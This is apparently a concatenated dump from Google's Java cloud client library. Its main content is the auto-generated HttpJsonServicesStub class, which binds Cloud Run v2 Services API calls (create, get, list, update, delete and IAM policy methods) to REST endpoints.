return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListPostureTemplatesRequest> PARSER = new com.google.protobuf.AbstractParser<ListPostureTemplatesRequest>() { @java.lang.Override public ListPostureTemplatesRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListPostureTemplatesRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListPostureTemplatesRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.securityposture.v1.ListPostureTemplatesRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
36,027
java-run/google-cloud-run/src/main/java/com/google/cloud/run/v2/stub/HttpJsonServicesStub.java
/*
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.cloud.run.v2.stub;

import static com.google.cloud.run.v2.ServicesClient.ListServicesPagedResponse;

import com.google.api.HttpRule;
import com.google.api.core.InternalApi;
import com.google.api.gax.core.BackgroundResource;
import com.google.api.gax.core.BackgroundResourceAggregation;
import com.google.api.gax.httpjson.ApiMethodDescriptor;
import com.google.api.gax.httpjson.HttpJsonCallSettings;
import com.google.api.gax.httpjson.HttpJsonOperationSnapshot;
import com.google.api.gax.httpjson.HttpJsonStubCallableFactory;
import com.google.api.gax.httpjson.ProtoMessageRequestFormatter;
import com.google.api.gax.httpjson.ProtoMessageResponseParser;
import com.google.api.gax.httpjson.ProtoRestSerializer;
import com.google.api.gax.httpjson.longrunning.stub.HttpJsonOperationsStub;
import com.google.api.gax.rpc.ClientContext;
import com.google.api.gax.rpc.OperationCallable;
import com.google.api.gax.rpc.RequestParamsBuilder;
import com.google.api.gax.rpc.UnaryCallable;
import com.google.api.pathtemplate.PathTemplate;
import com.google.cloud.run.v2.CreateServiceRequest;
import com.google.cloud.run.v2.DeleteServiceRequest;
import com.google.cloud.run.v2.GetServiceRequest;
import com.google.cloud.run.v2.ListServicesRequest;
import com.google.cloud.run.v2.ListServicesResponse;
import com.google.cloud.run.v2.Service;
import com.google.cloud.run.v2.UpdateServiceRequest;
import com.google.common.collect.ImmutableMap;
import com.google.iam.v1.GetIamPolicyRequest;
import com.google.iam.v1.Policy;
import com.google.iam.v1.SetIamPolicyRequest;
import com.google.iam.v1.TestIamPermissionsRequest;
import com.google.iam.v1.TestIamPermissionsResponse;
import com.google.longrunning.Operation;
import com.google.protobuf.TypeRegistry;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import javax.annotation.Generated;

// AUTO-GENERATED DOCUMENTATION AND CLASS.
/**
 * REST stub implementation for the Services service API.
 *
 * <p>This class is for advanced usage and reflects the underlying API directly.
 *
 * <p>Each RPC of the Services API is described by a static {@link ApiMethodDescriptor} that maps
 * the proto request onto an HTTP/JSON call (URL path, query parameters, request body, response
 * parser). The constructor then binds each descriptor to a {@link UnaryCallable} (and, for
 * long-running methods, an {@link OperationCallable}) via the supplied callable factory.
 */
@Generated("by gapic-generator-java")
public class HttpJsonServicesStub extends ServicesStub {
  // Registry handed to every response parser so messages referenced by type URL (e.g. a
  // `Service` packed inside an `Operation` response) can be resolved when parsing JSON.
  private static final TypeRegistry typeRegistry =
      TypeRegistry.newBuilder().add(Service.getDescriptor()).build();

  // CreateService: POST /v2/{parent}/services with the `Service` as the request body.
  // Returns a long-running Operation, hence the operation-snapshot factory at the end.
  private static final ApiMethodDescriptor<CreateServiceRequest, Operation>
      createServiceMethodDescriptor =
          ApiMethodDescriptor.<CreateServiceRequest, Operation>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/CreateService")
              .setHttpMethod("POST")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<CreateServiceRequest>newBuilder()
                      .setPath(
                          "/v2/{parent=projects/*/locations/*}/services",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<CreateServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "parent", request.getParent());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<CreateServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "serviceId", request.getServiceId());
                            serializer.putQueryParam(
                                fields, "validateOnly", request.getValidateOnly());
                            // "$alt=json;enum-encoding=int" asks the server for JSON responses
                            // with enum values encoded as integers.
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(
                          request ->
                              ProtoRestSerializer.create()
                                  .toBody("service", request.getService(), true))
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<Operation>newBuilder()
                      .setDefaultInstance(Operation.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .setOperationSnapshotFactory(
                  (CreateServiceRequest request, Operation response) ->
                      HttpJsonOperationSnapshot.create(response))
              .build();

  // GetService: GET /v2/{name}; no request body.
  private static final ApiMethodDescriptor<GetServiceRequest, Service> getServiceMethodDescriptor =
      ApiMethodDescriptor.<GetServiceRequest, Service>newBuilder()
          .setFullMethodName("google.cloud.run.v2.Services/GetService")
          .setHttpMethod("GET")
          .setType(ApiMethodDescriptor.MethodType.UNARY)
          .setRequestFormatter(
              ProtoMessageRequestFormatter.<GetServiceRequest>newBuilder()
                  .setPath(
                      "/v2/{name=projects/*/locations/*/services/*}",
                      request -> {
                        Map<String, String> fields = new HashMap<>();
                        ProtoRestSerializer<GetServiceRequest> serializer =
                            ProtoRestSerializer.create();
                        serializer.putPathParam(fields, "name", request.getName());
                        return fields;
                      })
                  .setQueryParamsExtractor(
                      request -> {
                        Map<String, List<String>> fields = new HashMap<>();
                        ProtoRestSerializer<GetServiceRequest> serializer =
                            ProtoRestSerializer.create();
                        serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                        return fields;
                      })
                  .setRequestBodyExtractor(request -> null)
                  .build())
          .setResponseParser(
              ProtoMessageResponseParser.<Service>newBuilder()
                  .setDefaultInstance(Service.getDefaultInstance())
                  .setDefaultTypeRegistry(typeRegistry)
                  .build())
          .build();

  // ListServices: GET /v2/{parent}/services with paging query parameters.
  private static final ApiMethodDescriptor<ListServicesRequest, ListServicesResponse>
      listServicesMethodDescriptor =
          ApiMethodDescriptor.<ListServicesRequest, ListServicesResponse>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/ListServices")
              .setHttpMethod("GET")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<ListServicesRequest>newBuilder()
                      .setPath(
                          "/v2/{parent=projects/*/locations/*}/services",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<ListServicesRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "parent", request.getParent());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<ListServicesRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "pageSize", request.getPageSize());
                            serializer.putQueryParam(fields, "pageToken", request.getPageToken());
                            serializer.putQueryParam(
                                fields, "showDeleted", request.getShowDeleted());
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(request -> null)
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<ListServicesResponse>newBuilder()
                      .setDefaultInstance(ListServicesResponse.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .build();

  // UpdateService: PATCH keyed by the nested resource name `service.name`; long-running.
  private static final ApiMethodDescriptor<UpdateServiceRequest, Operation>
      updateServiceMethodDescriptor =
          ApiMethodDescriptor.<UpdateServiceRequest, Operation>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/UpdateService")
              .setHttpMethod("PATCH")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<UpdateServiceRequest>newBuilder()
                      .setPath(
                          "/v2/{service.name=projects/*/locations/*/services/*}",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<UpdateServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(
                                fields, "service.name", request.getService().getName());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<UpdateServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(
                                fields, "allowMissing", request.getAllowMissing());
                            serializer.putQueryParam(fields, "updateMask", request.getUpdateMask());
                            serializer.putQueryParam(
                                fields, "validateOnly", request.getValidateOnly());
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(
                          request ->
                              ProtoRestSerializer.create()
                                  .toBody("service", request.getService(), true))
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<Operation>newBuilder()
                      .setDefaultInstance(Operation.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .setOperationSnapshotFactory(
                  (UpdateServiceRequest request, Operation response) ->
                      HttpJsonOperationSnapshot.create(response))
              .build();

  // DeleteService: DELETE /v2/{name}; long-running.
  private static final ApiMethodDescriptor<DeleteServiceRequest, Operation>
      deleteServiceMethodDescriptor =
          ApiMethodDescriptor.<DeleteServiceRequest, Operation>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/DeleteService")
              .setHttpMethod("DELETE")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<DeleteServiceRequest>newBuilder()
                      .setPath(
                          "/v2/{name=projects/*/locations/*/services/*}",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<DeleteServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "name", request.getName());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<DeleteServiceRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "etag", request.getEtag());
                            serializer.putQueryParam(
                                fields, "validateOnly", request.getValidateOnly());
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(request -> null)
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<Operation>newBuilder()
                      .setDefaultInstance(Operation.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .setOperationSnapshotFactory(
                  (DeleteServiceRequest request, Operation response) ->
                      HttpJsonOperationSnapshot.create(response))
              .build();

  // GetIamPolicy: GET on the custom ":getIamPolicy" verb of the service resource.
  private static final ApiMethodDescriptor<GetIamPolicyRequest, Policy>
      getIamPolicyMethodDescriptor =
          ApiMethodDescriptor.<GetIamPolicyRequest, Policy>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/GetIamPolicy")
              .setHttpMethod("GET")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<GetIamPolicyRequest>newBuilder()
                      .setPath(
                          "/v2/{resource=projects/*/locations/*/services/*}:getIamPolicy",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<GetIamPolicyRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "resource", request.getResource());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<GetIamPolicyRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "options", request.getOptions());
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(request -> null)
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<Policy>newBuilder()
                      .setDefaultInstance(Policy.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .build();

  // SetIamPolicy: POST on ":setIamPolicy". The `resource` field travels in the URL path, so it
  // is cleared from the copy of the request that is serialized as the "*" (whole-message) body.
  private static final ApiMethodDescriptor<SetIamPolicyRequest, Policy>
      setIamPolicyMethodDescriptor =
          ApiMethodDescriptor.<SetIamPolicyRequest, Policy>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/SetIamPolicy")
              .setHttpMethod("POST")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<SetIamPolicyRequest>newBuilder()
                      .setPath(
                          "/v2/{resource=projects/*/locations/*/services/*}:setIamPolicy",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<SetIamPolicyRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "resource", request.getResource());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<SetIamPolicyRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(
                          request ->
                              ProtoRestSerializer.create()
                                  .toBody("*", request.toBuilder().clearResource().build(), true))
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<Policy>newBuilder()
                      .setDefaultInstance(Policy.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .build();

  // TestIamPermissions: POST on ":testIamPermissions"; same clear-resource body convention
  // as SetIamPolicy above.
  private static final ApiMethodDescriptor<TestIamPermissionsRequest, TestIamPermissionsResponse>
      testIamPermissionsMethodDescriptor =
          ApiMethodDescriptor.<TestIamPermissionsRequest, TestIamPermissionsResponse>newBuilder()
              .setFullMethodName("google.cloud.run.v2.Services/TestIamPermissions")
              .setHttpMethod("POST")
              .setType(ApiMethodDescriptor.MethodType.UNARY)
              .setRequestFormatter(
                  ProtoMessageRequestFormatter.<TestIamPermissionsRequest>newBuilder()
                      .setPath(
                          "/v2/{resource=projects/*/locations/*/services/*}:testIamPermissions",
                          request -> {
                            Map<String, String> fields = new HashMap<>();
                            ProtoRestSerializer<TestIamPermissionsRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putPathParam(fields, "resource", request.getResource());
                            return fields;
                          })
                      .setQueryParamsExtractor(
                          request -> {
                            Map<String, List<String>> fields = new HashMap<>();
                            ProtoRestSerializer<TestIamPermissionsRequest> serializer =
                                ProtoRestSerializer.create();
                            serializer.putQueryParam(fields, "$alt", "json;enum-encoding=int");
                            return fields;
                          })
                      .setRequestBodyExtractor(
                          request ->
                              ProtoRestSerializer.create()
                                  .toBody("*", request.toBuilder().clearResource().build(), true))
                      .build())
              .setResponseParser(
                  ProtoMessageResponseParser.<TestIamPermissionsResponse>newBuilder()
                      .setDefaultInstance(TestIamPermissionsResponse.getDefaultInstance())
                      .setDefaultTypeRegistry(typeRegistry)
                      .build())
              .build();

  // One callable per RPC, built in the constructor from the descriptors above.
  private final UnaryCallable<CreateServiceRequest, Operation> createServiceCallable;
  private final OperationCallable<CreateServiceRequest, Service, Service>
      createServiceOperationCallable;
  private final UnaryCallable<GetServiceRequest, Service> getServiceCallable;
  private final UnaryCallable<ListServicesRequest, ListServicesResponse> listServicesCallable;
  private final UnaryCallable<ListServicesRequest, ListServicesPagedResponse>
      listServicesPagedCallable;
  private final UnaryCallable<UpdateServiceRequest, Operation> updateServiceCallable;
  private final OperationCallable<UpdateServiceRequest, Service, Service>
      updateServiceOperationCallable;
  private final UnaryCallable<DeleteServiceRequest, Operation> deleteServiceCallable;
  private final OperationCallable<DeleteServiceRequest, Service, Service>
      deleteServiceOperationCallable;
  private final UnaryCallable<GetIamPolicyRequest, Policy> getIamPolicyCallable;
  private final UnaryCallable<SetIamPolicyRequest, Policy> setIamPolicyCallable;
  private final UnaryCallable<TestIamPermissionsRequest, TestIamPermissionsResponse>
      testIamPermissionsCallable;

  private final BackgroundResource backgroundResources;
  private final HttpJsonOperationsStub httpJsonOperationsStub;
  private final HttpJsonStubCallableFactory callableFactory;

  // Templates for pulling the `location` segment out of request resource names; the extracted
  // value is fed to RequestParamsBuilder in the params extractors below (request routing params).
  private static final PathTemplate CREATE_SERVICE_0_PATH_TEMPLATE =
      PathTemplate.create("projects/*/locations/{location=*}");
  private static final PathTemplate GET_SERVICE_0_PATH_TEMPLATE =
      PathTemplate.create("projects/*/locations/{location=*}/**");
  private static final PathTemplate LIST_SERVICES_0_PATH_TEMPLATE =
      PathTemplate.create("projects/*/locations/{location=*}");
  private static final PathTemplate UPDATE_SERVICE_0_PATH_TEMPLATE =
      PathTemplate.create("projects/*/locations/{location=*}/**");
  private static final PathTemplate DELETE_SERVICE_0_PATH_TEMPLATE =
      PathTemplate.create("projects/*/locations/{location=*}/**");

  public static final HttpJsonServicesStub create(ServicesStubSettings settings)
      throws IOException {
    return new HttpJsonServicesStub(settings, ClientContext.create(settings));
  }

  public static final HttpJsonServicesStub create(ClientContext clientContext) throws IOException {
    return new HttpJsonServicesStub(
        ServicesStubSettings.newHttpJsonBuilder().build(), clientContext);
  }

  public static final HttpJsonServicesStub create(
      ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException {
    return new HttpJsonServicesStub(
        ServicesStubSettings.newHttpJsonBuilder().build(), clientContext, callableFactory);
  }

  /**
   * Constructs an instance of HttpJsonServicesStub, using the given settings. This is protected so
   * that it is easy to make a subclass, but otherwise, the static factory methods should be
   * preferred.
   */
  protected HttpJsonServicesStub(ServicesStubSettings settings, ClientContext clientContext)
      throws IOException {
    this(settings, clientContext, new HttpJsonServicesCallableFactory());
  }

  /**
   * Constructs an instance of HttpJsonServicesStub, using the given settings. This is protected so
   * that it is easy to make a subclass, but otherwise, the static factory methods should be
   * preferred.
   */
  protected HttpJsonServicesStub(
      ServicesStubSettings settings,
      ClientContext clientContext,
      HttpJsonStubCallableFactory callableFactory)
      throws IOException {
    this.callableFactory = callableFactory;
    // The Operations stub polls long-running operations over REST; the HttpRule map below
    // supplies the Cloud Run-specific "/v2/..." HTTP bindings for the generic
    // google.longrunning.Operations methods.
    this.httpJsonOperationsStub =
        HttpJsonOperationsStub.create(
            clientContext,
            callableFactory,
            typeRegistry,
            ImmutableMap.<String, HttpRule>builder()
                .put(
                    "google.longrunning.Operations.DeleteOperation",
                    HttpRule.newBuilder()
                        .setDelete("/v2/{name=projects/*/locations/*/operations/*}")
                        .build())
                .put(
                    "google.longrunning.Operations.GetOperation",
                    HttpRule.newBuilder()
                        .setGet("/v2/{name=projects/*/locations/*/operations/*}")
                        .build())
                .put(
                    "google.longrunning.Operations.ListOperations",
                    HttpRule.newBuilder()
                        .setGet("/v2/{name=projects/*/locations/*}/operations")
                        .build())
                .put(
                    "google.longrunning.Operations.WaitOperation",
                    HttpRule.newBuilder()
                        .setPost("/v2/{name=projects/*/locations/*/operations/*}:wait")
                        .build())
                .build());

    HttpJsonCallSettings<CreateServiceRequest, Operation> createServiceTransportSettings =
        HttpJsonCallSettings.<CreateServiceRequest, Operation>newBuilder()
            .setMethodDescriptor(createServiceMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add(request.getParent(), "location", CREATE_SERVICE_0_PATH_TEMPLATE);
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<GetServiceRequest, Service> getServiceTransportSettings =
        HttpJsonCallSettings.<GetServiceRequest, Service>newBuilder()
            .setMethodDescriptor(getServiceMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add(request.getName(), "location", GET_SERVICE_0_PATH_TEMPLATE);
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<ListServicesRequest, ListServicesResponse> listServicesTransportSettings =
        HttpJsonCallSettings.<ListServicesRequest, ListServicesResponse>newBuilder()
            .setMethodDescriptor(listServicesMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add(request.getParent(), "location", LIST_SERVICES_0_PATH_TEMPLATE);
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<UpdateServiceRequest, Operation> updateServiceTransportSettings =
        HttpJsonCallSettings.<UpdateServiceRequest, Operation>newBuilder()
            .setMethodDescriptor(updateServiceMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  // The routing key lives on the nested Service; guard against its absence.
                  if (request.getService() != null) {
                    builder.add(
                        request.getService().getName(), "location", UPDATE_SERVICE_0_PATH_TEMPLATE);
                  }
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<DeleteServiceRequest, Operation> deleteServiceTransportSettings =
        HttpJsonCallSettings.<DeleteServiceRequest, Operation>newBuilder()
            .setMethodDescriptor(deleteServiceMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add(request.getName(), "location", DELETE_SERVICE_0_PATH_TEMPLATE);
                  return builder.build();
                })
            .build();
    // The IAM methods route on the full `resource` value rather than an extracted segment.
    HttpJsonCallSettings<GetIamPolicyRequest, Policy> getIamPolicyTransportSettings =
        HttpJsonCallSettings.<GetIamPolicyRequest, Policy>newBuilder()
            .setMethodDescriptor(getIamPolicyMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add("resource", String.valueOf(request.getResource()));
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<SetIamPolicyRequest, Policy> setIamPolicyTransportSettings =
        HttpJsonCallSettings.<SetIamPolicyRequest, Policy>newBuilder()
            .setMethodDescriptor(setIamPolicyMethodDescriptor)
            .setTypeRegistry(typeRegistry)
            .setParamsExtractor(
                request -> {
                  RequestParamsBuilder builder = RequestParamsBuilder.create();
                  builder.add("resource", String.valueOf(request.getResource()));
                  return builder.build();
                })
            .build();
    HttpJsonCallSettings<TestIamPermissionsRequest, TestIamPermissionsResponse>
        testIamPermissionsTransportSettings =
            HttpJsonCallSettings.<TestIamPermissionsRequest, TestIamPermissionsResponse>newBuilder()
                .setMethodDescriptor(testIamPermissionsMethodDescriptor)
                .setTypeRegistry(typeRegistry)
                .setParamsExtractor(
                    request -> {
                      RequestParamsBuilder builder = RequestParamsBuilder.create();
                      builder.add("resource", String.valueOf(request.getResource()));
                      return builder.build();
                    })
                .build();

    this.createServiceCallable =
        callableFactory.createUnaryCallable(
            createServiceTransportSettings, settings.createServiceSettings(), clientContext);
    this.createServiceOperationCallable =
        callableFactory.createOperationCallable(
            createServiceTransportSettings,
            settings.createServiceOperationSettings(),
            clientContext,
            httpJsonOperationsStub);
    this.getServiceCallable =
        callableFactory.createUnaryCallable(
            getServiceTransportSettings, settings.getServiceSettings(), clientContext);
    this.listServicesCallable =
        callableFactory.createUnaryCallable(
            listServicesTransportSettings, settings.listServicesSettings(), clientContext);
    this.listServicesPagedCallable =
        callableFactory.createPagedCallable(
            listServicesTransportSettings, settings.listServicesSettings(), clientContext);
    this.updateServiceCallable =
        callableFactory.createUnaryCallable(
            updateServiceTransportSettings, settings.updateServiceSettings(), clientContext);
    this.updateServiceOperationCallable =
        callableFactory.createOperationCallable(
            updateServiceTransportSettings,
            settings.updateServiceOperationSettings(),
            clientContext,
            httpJsonOperationsStub);
    this.deleteServiceCallable =
        callableFactory.createUnaryCallable(
            deleteServiceTransportSettings, settings.deleteServiceSettings(), clientContext);
    this.deleteServiceOperationCallable =
        callableFactory.createOperationCallable(
            deleteServiceTransportSettings,
            settings.deleteServiceOperationSettings(),
            clientContext,
            httpJsonOperationsStub);
    this.getIamPolicyCallable =
        callableFactory.createUnaryCallable(
            getIamPolicyTransportSettings, settings.getIamPolicySettings(), clientContext);
    this.setIamPolicyCallable =
        callableFactory.createUnaryCallable(
            setIamPolicyTransportSettings, settings.setIamPolicySettings(), clientContext);
    this.testIamPermissionsCallable =
        callableFactory.createUnaryCallable(
            testIamPermissionsTransportSettings,
            settings.testIamPermissionsSettings(),
            clientContext);

    // Aggregates every background resource from the client context so close()/shutdown()
    // can manage them as one unit.
    this.backgroundResources =
        new BackgroundResourceAggregation(clientContext.getBackgroundResources());
  }

  /** Returns the method descriptors for all RPCs exposed by this stub (internal use only). */
  @InternalApi
  public static List<ApiMethodDescriptor> getMethodDescriptors() {
    List<ApiMethodDescriptor> methodDescriptors = new ArrayList<>();
    methodDescriptors.add(createServiceMethodDescriptor);
    methodDescriptors.add(getServiceMethodDescriptor);
    methodDescriptors.add(listServicesMethodDescriptor);
    methodDescriptors.add(updateServiceMethodDescriptor);
    methodDescriptors.add(deleteServiceMethodDescriptor);
    methodDescriptors.add(getIamPolicyMethodDescriptor);
    methodDescriptors.add(setIamPolicyMethodDescriptor);
    methodDescriptors.add(testIamPermissionsMethodDescriptor);
    return methodDescriptors;
  }

  public HttpJsonOperationsStub getHttpJsonOperationsStub() {
    return httpJsonOperationsStub;
  }

  @Override
  public UnaryCallable<CreateServiceRequest, Operation> createServiceCallable() {
    return createServiceCallable;
  }

  @Override
  public OperationCallable<CreateServiceRequest, Service, Service>
      createServiceOperationCallable() {
    return createServiceOperationCallable;
  }

  @Override
  public UnaryCallable<GetServiceRequest, Service> getServiceCallable() {
    return getServiceCallable;
  }

  @Override
  public UnaryCallable<ListServicesRequest, ListServicesResponse> listServicesCallable() {
    return listServicesCallable;
  }

  @Override
  public UnaryCallable<ListServicesRequest, ListServicesPagedResponse> listServicesPagedCallable() {
    return listServicesPagedCallable;
  }

  @Override
  public UnaryCallable<UpdateServiceRequest, Operation> updateServiceCallable() {
    return updateServiceCallable;
  }

  @Override
  public OperationCallable<UpdateServiceRequest, Service, Service>
      updateServiceOperationCallable() {
    return updateServiceOperationCallable;
  }

  @Override
  public UnaryCallable<DeleteServiceRequest, Operation> deleteServiceCallable() {
    return deleteServiceCallable;
  }

  @Override
  public OperationCallable<DeleteServiceRequest, Service, Service>
      deleteServiceOperationCallable() {
    return deleteServiceOperationCallable;
  }

  @Override
  public UnaryCallable<GetIamPolicyRequest, Policy> getIamPolicyCallable() {
    return getIamPolicyCallable;
  }

  @Override
  public UnaryCallable<SetIamPolicyRequest, Policy> setIamPolicyCallable() {
    return setIamPolicyCallable;
  }

  @Override
  public UnaryCallable<TestIamPermissionsRequest, TestIamPermissionsResponse>
      testIamPermissionsCallable() {
    return testIamPermissionsCallable;
  }

  @Override
  public final void close() {
    try {
      backgroundResources.close();
    } catch (RuntimeException e) {
      // Propagate unchecked failures unchanged; wrap checked ones below.
      throw e;
    } catch (Exception e) {
      throw new IllegalStateException("Failed to close resource", e);
    }
  }

  @Override
  public void shutdown() {
    backgroundResources.shutdown();
  }

  @Override
  public boolean isShutdown() {
    return backgroundResources.isShutdown();
  }

  @Override
  public boolean isTerminated() {
    return backgroundResources.isTerminated();
  }

  @Override
  public void shutdownNow() {
    backgroundResources.shutdownNow();
  }

  @Override
  public boolean awaitTermination(long duration, TimeUnit unit) throws InterruptedException {
    return backgroundResources.awaitTermination(duration, unit);
  }
}
googleapis/google-cloud-java
35,599
java-visionai/proto-google-cloud-visionai-v1/src/main/java/com/google/cloud/visionai/v1/RenewLeaseRequest.java
